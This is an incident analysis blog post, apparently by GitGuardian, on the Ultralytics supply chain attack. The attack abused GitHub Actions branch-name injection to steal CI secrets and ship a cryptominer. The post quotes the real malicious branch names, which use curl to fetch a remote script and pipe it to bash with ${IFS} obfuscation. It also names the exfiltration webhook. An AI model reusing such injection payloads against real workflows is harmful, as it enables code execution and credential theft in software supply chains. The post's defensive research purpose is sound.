The Ultralytics Supply Chain Attack: Connecting the Dots with GitGuardian’s Public Monitoring Data
On December 4, 2024, Ultralytics, a popular Python-based object detection and image segmentation model, was backdoored to deploy xmlrig, a cryptocurrency miner. The first compromised version was v8.3.41, followed by several others up to v8.3.46, indicating that the attacker managed to maintain their position several days after the initial attack.
The attacker abused git branch names to steal credentials, then uploaded a compromised Ultralytics package to PyPI. The initial technique has been known, and documented, since 2021. It consists in exploiting unsecure GitHub Actions workflows that manipulate user-controlled input such as the issue titles, or the branch name.
Let's take a look at the following example:
When the branch is not malicious, its name will be displayed. However, if it contains a valid shell command such as $(id)
, its name will be executed and the user identifier shown in the action logs.
Following the first report of the incident, William Woodruff shared a very complete investigation, based on the publicly available information and discussions with the community.
Since the attacker quickly deleted the payload files, branches, and other assets used in the attack, some important pieces are missing from this meticulous investigation. Because GitGuardian knows everything that happens on GitHub, we have access to those deleted files, branches, and commits that are scanned daily to detect leaked secrets and protect our customers.
This allows us to connect the dots.
Connecting the Dots
The repository exploitation was triggered from two Pull Requests, https://github.com/ultralytics/ultralytics/pull/18018 and https://github.com/ultralytics/ultralytics/pull/18020. They pointed to two branches of the malicious openimbot/openlytics repository: $({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
and $({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/file.sh}${IFS}|${IFS}bash)
. Those branches represented the attack vector.
Each branch name referenced a file in a commit that supposedly contained a malicious payload used during the exploitation. One of the challenges faced during the initial analysis of the attack was that both those files were removed from GitHub following the incident.
Thanks to the dataset available at GitGuardian, we could recover the commit information and the files they reference.
As forecasted in Woodruff’s analysis, the actual attack payload is a copy of the proof of concept from Adnan Khan's post on Github Actions cache poisoning. It uses the same Python memory dump tool and HTTP data exfiltration channel. The exfiltration occurred to a temporary HTTP webhook, hxxps://webhook.site/9212d4ee-df58-41db-886a-98d180a912e6, which has been deleted since then. We did not observe any other mention of this webhook across our GitHub dataset.
The second malicious pull request references a payload file with the same name, in another commit. Following our investigation, we believe this commit was never pushed to GitHub.
The event's timeline, from 19:57 to 20:32, for the first pull request, #18018, is as follows:
- Pull request open from the malicious branch
- The payload file committed to the branch
- Readme update committed
- Commits pushed, the attack is triggered
- Force push, the attacker cleans their traces
Because the commit hash had to be known for the branch to be created, we assume attackers had local copies of the commits they pushed to GitHub after the Pull Request was created. With this in mind, we guess that, after the first attack was successful, the attackers did not trigger the second exploitation.
Conclusion
Multiple exploitations of GitHub Actions injection attacks occurred in recent years. They often target machine learning code repositories like PyTorch or TensorFlow. Such attacks can have devastating consequences because of their supply chain nature.
The Ultralytics case is interesting because the attackers did not directly take advantage of the write access they had on the repository. They preferred extracting the CI/CD secrets instead. They later used them to poison the build cache and deploy malicious releases. This again emphasizes the prime importance of secrets as an attack vector, if not as an initial access vector.
Attacks on the CI/CD can sometimes go unnoticed. When properly executed, they tend to leave little traces. By adding honeytokens to your CI/CD secrets, you can get warned anytime attackers try to exploit your leaked secrets.
This research wouldn't have been possible without GitGuardian’s Public Monitoring Data which collects and scans billions of commits on GitHub, detecting and alerting on exposed secrets. By proactively notifying developers, we help prevent breaches at their earliest stage.